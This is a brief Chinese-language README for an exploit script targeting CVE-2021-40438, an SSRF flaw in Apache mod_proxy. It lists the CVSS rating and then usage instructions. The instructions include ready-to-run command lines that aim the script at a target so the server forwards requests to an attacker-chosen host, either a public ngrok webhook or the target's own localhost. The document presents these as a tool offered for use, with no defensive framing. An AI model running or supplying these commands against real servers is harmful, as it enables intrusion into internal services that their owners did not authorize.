精心构造的请求 URI 路径可能导致 mod_proxy 将请求转发到远程用户选择的源服务器。此问题影响 Apache HTTP Server 2.4.48 及更早版本。
基础分数:9.0 严重程度:严重 CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
攻击向量:网络 攻击复杂度:高 所需权限:无 用户交互:无 影响范围:已变更 机密性:高 完整性:高 可用性:高
漏洞类别:服务器端请求伪造(SSRF)
该脚本使用 requests 库通过提供的 URL 执行 HTTP GET 请求。你可以从命令行运行该脚本,通过指定 -t 和 -ssrf 选项来自定义 URL。
你可以使用 ngrok 作为本地 webhook,而无需开放本地端口,或使用互联网上的公共 webhook。
python3 CVE-2021-40438.py -t https://target.com -ssrf https://cf92-88-26-100-207.ngrok-free.app/ssrf
python3 CVE-2021-40438.py -t https://target.com -ssrf http://127.0.0.1
在运行脚本之前,请确保已安装 requests 库。你可以使用以下命令进行安装:
pip install requests